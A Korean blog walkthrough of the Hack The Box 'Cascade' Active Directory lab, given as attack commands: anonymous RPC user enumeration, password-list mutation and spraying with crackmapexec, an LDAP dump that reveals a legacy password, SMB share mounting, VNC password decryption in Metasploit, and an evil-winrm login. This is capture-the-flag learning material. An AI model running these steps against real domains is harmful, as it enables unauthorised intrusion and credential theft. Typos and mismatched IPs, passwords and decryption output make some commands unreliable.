AD 공략 6 (decrypt VNC)
[목차]
1. CASE 8 - HTB Cascade
[공략 과정 정리]
1. 포트 확인
DNS 53, kerberos 88, SMB 445, ldap 389
Web Server
![](https://blog.kakaocdn.net/dn/c4hKhj/btrMePScVVE/NDrBh4nubKoTkcDdLdXmQ0/img.png)
2. hosts 파일 등록
도메인 확인되면 바로 add to hosts file
10.10.10.182 cascade.local cascade
3. Set Enumeration Target
1) SMB
- Usernames/groups?
- File shares
- Bruteforce
2) LDAP
- Usernames
- Other info
3-1) SMB enum
: Usernames & Groups
# rcpclient -U '' 192.168.137.131
> enumdomusers
![](https://blog.kakaocdn.net/dn/MJ33N/btrMgQizkCZ/mcNMet2J4vdDe9qKoxfUS1/img.png)
몽땅 카피 후 리스트 업
# cat list | awk -F\[ '{print $2}' | awk -F\] '{print $1}' > users.lst
![](https://blog.kakaocdn.net/dn/Qg9ld/btrMdNAW6G5/g26MFHFAwK3KMDzs2KKzak/img.png)
# rcpclient -U '' 192.168.137.131
> querydispinfo
![](https://blog.kakaocdn.net/dn/cUEQHz/btrL9YCHI0D/dR2sAtR0e7hPDKKUk5Niak/img.png)
> 별거 없음
: File Shares
# crackmapexec smb 192.168.137.131 --shares
# crackmapexec smb 192.168.137.131 -u '' --shares
# crackmapexec smb 192.168.137.131 -u '' -p '' --shares
![](https://blog.kakaocdn.net/dn/dfm2ud/btrMd7sjiR1/xv7jVxxwkkuI2uJ58ne001/img.png)
# smbclient -L //192.168.137.131
# smbclient -L //192.168.137.131 -U ''
> doesn't look like we can enumerate file shares
3-2) LDAP
: 해당 box 또는 username 생성 시기 확인
# rcpclient -U '' 192.168.137.131
> querydispinfo2
> queryuser 0x452
![](https://blog.kakaocdn.net/dn/kIMSY/btrMgRPi9v0/5UCsYgjZSvg9CwdmYsGUE1/img.png)
> 최근 접속한 사용자 정보 확인 (Logon Time)
![](https://blog.kakaocdn.net/dn/noD2s/btrMcPeZRJm/NOG2rLJoSu6PynJ89wkqO1/img.png)
> 마지막으로 비번 설정된 월, theme 확인
: 계절, 월 등..
: password list 생성
![](https://blog.kakaocdn.net/dn/Vhga0/btrMd6AbMgJ/0RgY6vwiCmLJz5NwwURzb1/img.png)
# mutate passwords
# hashcat --force passwords -r /usr/share/hashcat/rules/best64.rule --stdout > pass.lst
# sort -u pass.lst > passwords.lst
: Bruteforce
1. Check password policy
# crackmapexec smb 192.168.139.131 --pass-pol
![](https://blog.kakaocdn.net/dn/butQJY/btrMeQDzZNQ/XszeMFZvZSGkpAe9gPX1O0/img.png)
> Account Lockout Threshold : None
마음놓고 돌려도 됨
# crackmapexec smb 192.168.139.131 -u users.lst -p passwords.lst
![](https://blog.kakaocdn.net/dn/mVPgD/btrMdRpLloj/o6RXsxHErysnbktawV3dzk/img.png)
: LDAP
# ldapsearch -x -h 192.168.138.131 -s base namingcontexts
![](https://blog.kakaocdn.net/dn/byTRI3/btrMd2khwuH/iFpkjk84hpamhkX5eVTtZk/img.png)
# ldapsearch -x -h 192.168.138.131 -s sub -b 'DC=cascade,DC=local' > results
# cat results | awk '{peint $1}' | sort | uniq -x | sort -nr
# cat results | awk '{peint $1}' | sort | uniq -x | sort -nr | grep ':'
# cat results | awk '{peint $1}' | sort | uniq -x | sort -nr | grep ':' > tmp
# less tmp
/cascadeLagacyPwd 검색
![](https://blog.kakaocdn.net/dn/d8ICgm/btrMeiNTmKQ/VVzR1GZ1nvJvrTwcOl06G0/img.png)
![](https://blog.kakaocdn.net/dn/d6iITW/btrMgRu0pYF/vLgfe8ELBcg8808XKRaP9k/img.png)
![](https://blog.kakaocdn.net/dn/bUr9mi/btrMdMotUzq/z07WcKQvst0qHbte1EGSEK/img.png)
> Ryan Thompson,
sAMAccountName : r.thompson
cascadeLegacyPwd : clk0bjVldmE=
> base64 -d 한 뒤 접속시도
# crackmapexec smb 192.168.138.131 -u r.thompson -p rY4n5eva
# crackmapexec smb 192.168.138.131 -u r.thompson -p rY4n5eva --shares
# crackmapexec smb 192.168.138.131 -u r.thompson -p rY4n5eva -M spider_plus
![](https://blog.kakaocdn.net/dn/QVJk5/btrMeGnwEUv/YHHC4auVyiFbMub5JrnX60/img.png)
![](https://blog.kakaocdn.net/dn/buWaZO/btrMaeSRLP2/AiKyE1lBLcHWISHUJ40dl1/img.png)
> Data / print shares 는 AD에서 직접 생성했기때문에 확인해봐야함
(ADMIN, NETLOGON은 배제, SYSVOL은 group policy info 확인 가능)
![](https://blog.kakaocdn.net/dn/d0OSos/btrMcSW3LFW/lpCW5RDFMjheND2V42uv20/img.png)
: mount shares
# mkdir /mnt/data
# mount -t cifs -o 'user=r.thompson,password=rYan5eva' //192.168.137.131/data /mnt/data
# mkdir /mnt/netlogon
# mount -t cifs -o 'user=r.thompson,password=rYan5eva' //192.168.137.131/netlogon /mnt/netlogon
![](https://blog.kakaocdn.net/dn/bQuQia/btrMecUx9Qt/iZRnLfDdI4ARhJfaCC4Ack/img.png)
> netlogon 확인
![](https://blog.kakaocdn.net/dn/bVLBhY/btrMd1MuNuN/zKmcgwTyMe0F5XNYcnHON0/img.png)
> 새 shares \\CASC-DC1\Audit 확인 후
마운트 시도 시 permission denied
> data 확인
# find .
# find . -type f
![](https://blog.kakaocdn.net/dn/bvg3Pz/btrMedMDmvT/jpwXtkvgMktWKm6SLTyDjk/img.png)
![](https://blog.kakaocdn.net/dn/bI0njt/btrMffiQ5j7/ylrhle2HQsuC9gISgc5vnK/img.png)
> password가 registry vnc hex값으로 저장되어 있음
$> msfconsole
msf5 > irb
[*] Starting IRB shell...
[*] You are in the "framework" object
>> fixedkey = "\x17\x52\x6b\x06\x23\x4e\x58\x07"
=> "\u0017Rk\u0006#NX\a"
>> require 'rex/proto/rfb'
=> true
>> Rex::Proto::RFB::Cipher.decrypt ["D7A514D8C556AADE"].pack('H*'), fixedkey
=> "Secure!\x00"
>>
![](https://blog.kakaocdn.net/dn/bMyObs/btrMdMWnYyh/goMM6LsLfbb2lwWO0kAUsk/img.png)
: 접속 시도
# crackmapexec smb 192.168.137.131 -u users.lst -p sT333ve2
> 비번에 맞는 user 확인
# crackmapexec smb 192.168.137.131 -u s.smith -p sT333ve2
> pwn3d! 여부 확인
# crackmapexec smb 192.168.137.131 -u s.smith -p sT333ve2 -M spider_plus
> 추가 정보가 있는지 확인
# evil-winrm -i 192.168.137.131 -i s.smith -p
> pwn3d!가 떴기 때문에 시도
![](https://blog.kakaocdn.net/dn/cOcU1I/btrMePScVNG/P8hviL7HWkoVNikWWfjQf0/img.png)
내일 이어서